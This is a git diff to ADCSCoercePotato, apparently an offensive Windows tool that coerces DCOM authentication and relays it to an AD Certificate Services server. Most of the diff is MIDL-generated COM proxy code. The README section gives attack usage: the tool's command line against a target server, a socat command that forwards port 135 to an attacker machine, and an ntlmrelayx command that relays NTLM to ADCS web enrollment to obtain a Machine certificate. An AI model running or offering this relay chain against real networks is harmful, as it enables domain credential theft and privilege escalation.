ISpecialSystemProperties_GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) \ + ( (This)->lpVtbl -> GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) ) + +#define ISpecialSystemProperties_SetClientImpersonating(This,fClientImpersonating) \ + ( 
(This)->lpVtbl -> SetClientImpersonating(This,fClientImpersonating) ) + +#define ISpecialSystemProperties_GetClientImpersonating(This,pfClientImpersonating) \ + ( (This)->lpVtbl -> GetClientImpersonating(This,pfClientImpersonating) ) + +#define ISpecialSystemProperties_SetPartitionId(This,guidPartiton) \ + ( (This)->lpVtbl -> SetPartitionId(This,guidPartiton) ) + +#define ISpecialSystemProperties_GetPartitionId(This,pguidPartiton) \ + ( (This)->lpVtbl -> GetPartitionId(This,pguidPartiton) ) + +#define ISpecialSystemProperties_SetProcessRequestType(This,dwPRT) \ + ( (This)->lpVtbl -> SetProcessRequestType(This,dwPRT) ) + +#define ISpecialSystemProperties_GetProcessRequestType(This,pdwPRT) \ + ( (This)->lpVtbl -> GetProcessRequestType(This,pdwPRT) ) + +#define ISpecialSystemProperties_SetOrigClsctx(This,dwClsctx) \ + ( (This)->lpVtbl -> SetOrigClsctx(This,dwClsctx) ) + +#define ISpecialSystemProperties_GetOrigClsctx(This,dwClsctx) \ + ( (This)->lpVtbl -> GetOrigClsctx(This,dwClsctx) ) + +#define ISpecialSystemProperties_GetDefaultAuthenticationLevel(This,pdwAuthnLevel) \ + ( (This)->lpVtbl -> GetDefaultAuthenticationLevel(This,pdwAuthnLevel) ) + +#define ISpecialSystemProperties_SetDefaultAuthenticationLevel(This,dwAuthnLevel) \ + ( (This)->lpVtbl -> SetDefaultAuthenticationLevel(This,dwAuthnLevel) ) + +#endif /* COBJMACROS */ + + +#endif /* C style interface */ + + + + +#endif /* __ISpecialSystemProperties_INTERFACE_DEFINED__ */ + + +/* Additional Prototypes for ALL interfaces */ + +/* end of Additional Prototypes */ + +#ifdef __cplusplus +} +#endif + +#endif + + diff --git a/IStandardActivator_i.c b/IStandardActivator_i.c index fd764df..8a74e09 100644 --- a/IStandardActivator_i.c +++ b/IStandardActivator_i.c 
@@ -5,11 +5,11 @@ /* link this file in with the server and any clients */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: diff --git a/IStandardActivator_p.c b/IStandardActivator_p.c index 2ca89b6..e4afa4b 100644 --- a/IStandardActivator_p.c +++ b/IStandardActivator_p.c @@ -3,11 +3,11 @@ /* this ALWAYS GENERATED file contains the proxy stub code */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: 
@@ -77,58 +77,6 @@ static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; -#if defined(_CONTROL_FLOW_GUARD_XFG) -#define XFG_TRAMPOLINES(ObjectType)\ -static unsigned long ObjectType ## _UserSize_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ -{\ -return ObjectType ## _UserSize(pFlags, Offset, pObject);\ -}\ -static unsigned char * ObjectType ## _UserMarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserMarshal(pFlags, pBuffer, pObject);\ -}\ -static unsigned char * ObjectType ## _UserUnmarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserUnmarshal(pFlags, pBuffer, pObject);\ -}\ -static void ObjectType ## _UserFree_XFG(unsigned long * pFlags, void * pObject)\ -{\ -ObjectType ## _UserFree(pFlags, pObject);\ -} -#define XFG_TRAMPOLINES64(ObjectType)\ -static unsigned long ObjectType ## _UserSize64_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ -{\ -return ObjectType ## _UserSize64(pFlags, Offset, pObject);\ -}\ -static unsigned char * ObjectType ## _UserMarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserMarshal64(pFlags, pBuffer, pObject);\ -}\ -static unsigned char * ObjectType ## _UserUnmarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ -{\ -return ObjectType ## _UserUnmarshal64(pFlags, pBuffer, pObject);\ -}\ -static void ObjectType ## _UserFree64_XFG(unsigned long * pFlags, void * pObject)\ -{\ -ObjectType ## _UserFree64(pFlags, pObject);\ -} -#define XFG_BIND_TRAMPOLINES(HandleType, ObjectType)\ -static void* ObjectType ## _bind_XFG(HandleType pObject)\ -{\ -return ObjectType ## _bind((ObjectType) pObject);\ -}\ -static void ObjectType ## _unbind_XFG(HandleType pObject, handle_t 
ServerHandle)\ -{\ -ObjectType ## _unbind((ObjectType) pObject, ServerHandle);\ -} -#define XFG_TRAMPOLINE_FPTR(Function) Function ## _XFG -#else -#define XFG_TRAMPOLINES(ObjectType) -#define XFG_TRAMPOLINES64(ObjectType) -#define XFG_BIND_TRAMPOLINES(HandleType, ObjectType) -#define XFG_TRAMPOLINE_FPTR(Function) Function -#endif - extern const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL_TypeFormatString; @@ -180,11 +128,11 @@ static const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL /* this ALWAYS GENERATED file contains the proxy stub code */ - /* File created by MIDL compiler version 8.01.0626 */ -/* at Tue Jan 19 04:14:07 2038 + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 */ /* Compiler settings for IStandardActivator.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : all , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: @@ -245,7 +193,7 @@ static const MIDL_STUB_DESC Object_StubDesc = 1, /* -error bounds_check flag */ 0x60001, /* Ndr library version */ 0, - 0x8010272, /* MIDL Version 8.1.626 */ + 0x801026e, /* MIDL Version 8.1.622 */ 0, 0, 0, /* notify & notify_flag routine table */ diff --git a/MSFRottenPotato.h b/MSFRottenPotato.h index 8feb280..cff1f11 100644 --- a/MSFRottenPotato.h +++ b/MSFRottenPotato.h @@ -19,7 +19,7 @@ class PotatoAPI { DWORD startRPCConnectionThread(); DWORD startCOMListenerThread(); int startCOMListener(void); - int triggerDCOM(); + int triggerDCOM(int); SOCKET ListenSocket = INVALID_SOCKET; SOCKET ClientSocket = INVALID_SOCKET; diff --git a/README.md b/README.md index 40efd1d..1392fb1 100644 --- a/README.md +++ b/README.md 
@@ -6,9 +6,6 @@ ADCSCoercePotato - @decoder_it 2024 Mandatory args: --u Domain Username --p password --d Domain Name -m remote DCOM (ADCS) server address -k redirector where socat and ntlmrelayx is running @@ -17,9 +14,16 @@ Optional args: -n HTTP port where redirector (ntlmrelayx) is listening, default:80 -l local socket server port, default:9999 -c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3} +-u Domain Username +-p password +-d Domain Name +-s session (it seems not working, idk why) Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89) and ADCS web enrollment service is also running on:192.168.212.41 -> socat tcp -listen:135, reuseaddr, fork tcp:192.168.1.89:9999 & -> ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --template Machine -smb2support + +``` +![изображение](https://github.com/MzHmO/ADCSCoercePotato/assets/92790655/26c44476-215e-4722-ae28-96a52ab5154e) diff --git a/dlldata.c b/dlldata.c new file mode 100644 index 0000000..c30c2e7 --- /dev/null +++ b/dlldata.c @@ -0,0 +1,37 @@ +/********************************************************* + DllData file -- generated by MIDL compiler + + DO NOT ALTER THIS FILE + + This file is regenerated by MIDL on every IDL file compile. + + To completely reconstruct this file, delete it and rerun MIDL + on all the IDL files in this DLL, specifying this file for the + /dlldata command line option + +*********************************************************/ + + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +EXTERN_PROXY_FILE( IStandardActivator ) + + +PROXYFILE_LIST_START +/* Start of list */ + REFERENCE_PROXY_FILE( IStandardActivator ), +/* End of list */ +PROXYFILE_LIST_END + + +DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) + +#ifdef __cplusplus +} /*extern "C" */ +#endif + +/* end of generated dlldata file */